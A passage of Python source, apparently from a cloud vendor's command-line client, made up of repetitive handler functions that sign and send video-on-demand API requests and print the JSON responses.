profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateImageSpriteTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateImageSpriteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePersonSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePersonSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribePersonSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAIRecognitionTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAIRecognitionTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAIRecognitionTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateSubAppId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSubAppIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSubAppId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAnimatedGraphicsTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAnimatedGraphicsTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAnimatedGraphicsTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doForbidMediaDistribution(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ForbidMediaDistributionRequest()
model.from_json_string(json.dumps(args))
rsp = client.ForbidMediaDistribution(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doManageTask(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ManageTaskRequest()
model.from_json_string(json.dumps(args))
rsp = client.ManageTask(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySnapshotByTimeOffsetTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySnapshotByTimeOffsetTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySnapshotByTimeOffsetTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySuperPlayerConfig(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySuperPlayerConfigRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySuperPlayerConfig(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateWordSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateWordSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateWordSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySubAppIdInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySubAppIdInfoRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySubAppIdInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAdaptiveDynamicStreamingTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAdaptiveDynamicStreamingTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAdaptiveDynamicStreamingTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyWordSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyWordSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyWordSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeImageSpriteTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImageSpriteTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeImageSpriteTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAllClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAllClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAllClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWatermarkTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWatermarkTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWatermarkTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateWatermarkTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateWatermarkTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateWatermarkTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAIRecognitionTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAIRecognitionTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAIRecognitionTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSuperPlayerConfigs(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSuperPlayerConfigsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSuperPlayerConfigs(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSubAppIds(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSubAppIdsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSubAppIds(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCommitUpload(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CommitUploadRequest()
model.from_json_string(json.dumps(args))
rsp = client.CommitUpload(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAIRecognitionTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAIRecognitionTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAIRecognitionTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAdaptiveDynamicStreamingTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAdaptiveDynamicStreamingTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAdaptiveDynamicStreamingTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSearchMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SearchMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.SearchMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteWatermarkTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteWatermarkTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteWatermarkTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeletePersonSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeletePersonSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeletePersonSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAnimatedGraphicsTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAnimatedGraphicsTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAnimatedGraphicsTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAnimatedGraphicsTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
